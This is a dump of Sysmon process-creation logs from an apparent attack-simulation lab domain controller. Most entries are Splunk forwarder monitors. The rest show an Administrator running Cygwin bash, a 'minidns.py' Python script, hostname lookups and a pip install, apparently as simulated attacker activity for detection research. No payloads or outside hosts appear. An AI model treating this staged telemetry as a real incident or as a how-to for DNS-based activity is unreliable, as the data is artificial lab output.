154100x800000000000000065884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:20.566{A8622C2F-57D4-6078-D10D-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:19.962{A8622C2F-57D3-6078-D00D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:19.280{A8622C2F-57D3-6078-CF0D-00000000AE01}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:17.652{A8622C2F-57D1-6078-CE0D-00000000AE01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:16.970{A8622C2F-57D0-6078-CD0D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000065829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:16.322{A8622C2F-57D0-6078-CC0D-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.185{A8622C2F-57B9-6078-CB0D-00000000AE01}1644C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.183{A8622C2F-57B9-6078-CA0D-00000000AE01}6164C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 
154100x800000000000000065686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.177{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-57B9-6078-C80D-00000000AE01}4560C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000065678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.132{A8622C2F-57B9-6078-C80D-00000000AE01}4560C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-57B9-6078-C70D-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.102{A8622C2F-57B9-6078-C70D-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:22.396{A8622C2F-579A-6078-C60D-00000000AE01}6432C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.728{A8622C2F-5799-6078-C50D-00000000AE01}6656C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-5799-6078-C40D-00000000AE01}4252C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.719{A8622C2F-5799-6078-C40D-00000000AE01}4252C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-C30D-00000000AE01}6416C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:11:21.711{A8622C2F-5799-6078-C30D-00000000AE01}6416C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.695{A8622C2F-5799-6078-C20D-00000000AE01}5864C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5799-6078-C10D-00000000AE01}1996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.686{A8622C2F-5799-6078-C10D-00000000AE01}1996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-C00D-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:11:21.678{A8622C2F-5799-6078-C00D-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065462Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.664{A8622C2F-5799-6078-BF0D-00000000AE01}5744C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-5799-6078-BE0D-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.655{A8622C2F-5799-6078-BE0D-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BD0D-00000000AE01}2112C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065442Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:11:21.647{A8622C2F-5799-6078-BD0D-00000000AE01}2112C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.628{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BB0D-00000000AE01}5384C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.613{A8622C2F-5799-6078-BB0D-00000000AE01}5384C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.583{A8622C2F-5799-6078-B90D-00000000AE01}5340C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 
0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.481{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000065327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:20.645{A8622C2F-5798-6078-B70D-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065299Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:19.973{A8622C2F-5797-6078-B60D-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk 
Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065289Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:19.300{A8622C2F-5797-6078-B50D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:17.633{A8622C2F-5795-6078-B30D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000065228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:16.967{A8622C2F-5794-6078-B20D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:16.300{A8622C2F-5794-6078-B10D-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065150Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.023{A8622C2F-578E-6078-B00D-00000000AE01}3300C:\cygwin64\bin\cut.exe-----cut -d ' ' 
-f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.021{A8622C2F-578E-6078-AF0D-00000000AE01}2952C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.016{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-578D-6078-AD0D-00000000AE01}644C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000065127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:09.971{A8622C2F-578D-6078-AD0D-00000000AE01}644C:\Python27\python.exe-----C:\Python27\python.exe 
minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-578D-6078-AC0D-00000000AE01}2424C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:09.961{A8622C2F-578D-6078-AC0D-00000000AE01}2424C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:07.144{A8622C2F-578B-6078-AB0D-00000000AE01}4560C:\Python27\python.exe-----c:\python27\python.exe -u -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record c:\users\admini~1\appdata\local\temp\2\pip-record-qukxb0\install-record.txt --single-version-externally-managed --compilec:\users\admini~1\appdata\local\temp\2\pip-install-hhhogx\socket.py\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe"c:\python27\python.exe" 
